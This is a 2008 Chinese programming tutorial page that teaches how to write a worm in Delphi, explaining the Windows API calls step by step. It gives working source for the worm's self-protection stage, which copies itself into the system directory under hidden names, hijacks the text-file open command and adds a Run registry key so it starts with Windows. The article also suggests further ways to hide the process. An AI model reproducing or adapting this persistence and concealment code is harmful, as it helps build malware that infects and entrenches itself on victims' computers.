用Delphi来编写蠕虫病毒浅析_Deiphi网络编程_Deiphi_编程开发

用Delphi来编写蠕虫病毒浅析

日期：2008-10-20 22:10:20　　　　来源：

　·在Delphi7中实现停靠功能　·用Delphi编写后台监控软件
　·手工查杀网页病毒实录

用Delphi来编写蠕虫病毒浅析。前言：

　　可能大家想到病毒，第一反应就是可能是用asm来编写，或者是vbsript，而高级语言如delphi就好象不能编写一样，其实事实并不是这个样子的，只要我们花一些时间，照样可以写出简短而高效的病毒程序来，一点也不输那些用汇编写出来的程序哦。

　　一个病毒程序首先要短小，我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道，如果在uses里面加入forms,classes.....等就会使目标文件非常的大，所以，在我们的程序里，我们要尽可能的不用这些库。我们只用windows,winsock,shellapi,sysutils(这个里面包含了一些常用的函数，比如对文件的操作，对字符串的操作，如果用自己的程序来代替，目标文件会更加的小)

　　首先，我们知道，一个病毒程序一般都分下面三个模块：

　　①保护模块；

　　②感染模块；

　　③发作模块。

　　下面我们就从这三个模块开始，分别实现他们的代码。

　　一)保护模块。

　　一般，我们都是把自身拷贝到系统的一些目录里，比如%systemroot%。那么，我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectory ：

UINT GetSystemDirectory(
LPTSTR lpBuffer, // 存放返回的字符串的缓冲区
UINT uSize // 上面的缓冲去的长度
);
　　相关的函数还有GetWindowsDirectory可以得到%windows%的路径

　　得到了系统的目录后，第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile ：

BOOL CopyFile(
LPCTSTR lpExistingFileName, // 源文件的路径
LPCTSTR lpNewFileName, // 目标文件的路径
BOOL bFailIfExists // 这是一个标志，如果目标文件已经存在，是否强制覆盖
);
　　拷贝文件完毕后,我们来把这个文件设置为系统和隐藏，那么一般情况是看不见该文件的，除非选取查看所有文件，以及显示受保护文件。同样，介绍一个函数SetFileAttributes ：

BOOL SetFileAttributes(
LPCTSTR lpFileName, // 需要设置的文件的文件名
DWORD dwFileAttributes // 设置的值。
);
　　我们这里要设置为隐藏和系统，那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM

　　下面就是最重要的，让该文件开机自动运行，我们一般都是写注册表，首先用RegOpenKey函数来打开一个键。

　
LONG RegOpenKey(
HKEY hKey, // 主键，比如HKEY_LOCAL_MACHINE
LPCTSTR lpSubKey, // 跟随的subkey
PHKEY phkResult // 存放函数返回这个打开的键的句柄
);
　　得到了HKEY后，就可以用regsetvalueex来向该键写具体的值了。

LONG RegSetvalueEx(
HKEY hKey, // 这个就是刚才我们得到的句柄
LPCTSTR lpvalueName, // 键名的地址
DWORD Reserved, // 一般设置为0
DWORD dwType, // 我们写的键的类型，字符串为REG_SZ
CONST BYTE *lpData, // 键值的地址
DWORD cbData // 写入的键值的长度
);
　　下面，我综合上面的说明来给出一个简短的例子：

procedure SelfCopy;
var
Path,value:array [0..255] of char;
Hk:HKEY;
S:string;
begin
GetSystemDirectory(Path,256);
//取得系统的路径
s:=strpas(Path);
//转换成字符串
CopyFile(pchar(paramstr(0)),pchar(S+‘/ruin.exe‘),false);
CopyFile(pchar(paramstr(0)),pchar(S+‘/virus_ruin.exe‘),false);
//把自身拷贝到系统目录下为ruin.exe,virus_ruin.exe
SetFileAttributes(pchar(S+‘/ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(pchar(S+‘/virus_ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
//设置刚才的两个文件为系统和隐藏
RegOpenKey(HKEY_CLASSES_ROOT,‘txtfile/shell/open/command‘,Hk);
value:=‘virus_ruin.exe %1‘;
RegSetvalueEx(Hk,‘‘,0,REG_SZ,@value,17);
//把virus_ruin.exe和文本文件关联
RegOpenKey(HKEY_LOCAL_MACHINE,‘Software/Microsoft/Windows/CurrentVersion/Run‘,Hk);
value:=‘ruin.exe‘;
RegSetvalueEx(Hk,‘ruin‘,0,REG_SZ,@value,8);
//设置开机自动运行ruin.exe
end;
　　我们看上面的这个程序，就完成了自我复制，和开机自动运行，并且关联了文本文件，这样，如果run下的键被删除，那么他打开文本文件，蠕虫文件又被激活。

　　不过这个样子，你就需要在你的主程序里面进行判断，如果传递的参数等于1 ，则打开该文本，并且进行自我保护。

　　如：

begin
if paramcount=1 then
shellexecute(0,‘open‘,‘notepad.exe‘,pchar(paramstr(1)),nil,sw_normal);
//其他的代码
　　这里，我只是给出一个简单的例子来描述出一个大概的思路，很多地方还不完善，比如进程的隐藏，你可以进行判断，如果是98你可以registerserverapplication如果你是用的2000，你可以做为服务启动，或者是插入dll，或者是用求职信的方法，开机加载一个dll,或者是win.ini。　[1]

--->QQ病毒专杀工具XP QQKav 2006 Build 0718 绿色注册版
--->卡巴斯基病毒专杀清除 V7.0
--->反木马病毒专家 2007 V2.3.1┊专业的反木马、反病毒软件┊简体中文绿色特别版
--->瑞星“熊猫烧香Worm.Nimaya”病毒专杀 V1.9┊检测并查杀┊简体中文绿色免费版
--->熊猫烧香病毒专杀绿色合集 01.15┊集合大量熊猫烧香专杀┊简体中文绿色特别版
Tags:　 Delphi 编写蠕虫病毒 {$enumber$}

用Delphi来编写蠕虫病毒浅析

在DELPHI中如何调用系统对话框

Delphi编写网络程序的安全措施

与修改系统日期病毒的战争

◎→	本类最新
远程程序运行状态的简单监控在IE上增添一个按钮在Delphi中实现ASP编程在Delphi程序中应用IE浏览器控件在DELPHI程序中拨号上网用Delphi编写ASP的ActiveX服务器用Delphi编写CGI程序返回图象

◎→相关资源
C语言入门视频教程 C#编程WinForm入门视频 Asp.net入门视频教程下载 VC++编程视频教程下载 VB窗体文章 HTML入门教程 Deiphi实例教程 Deiphi窗体文章 Deiphi数据库编程 Deiphi网络编程 Deiphi图形图象文章 Deiphi系统文件

◎→	热门资源
在Delphi7中实现停靠功能在DELPHI中如何调用系统对话框 DELPHI中的消息处理机制(1) 用Delphi编制趣味动画鼠标资源文件的应用怎样向SQL Server插入带有Image字支持D6的FastReport2.45 (报表控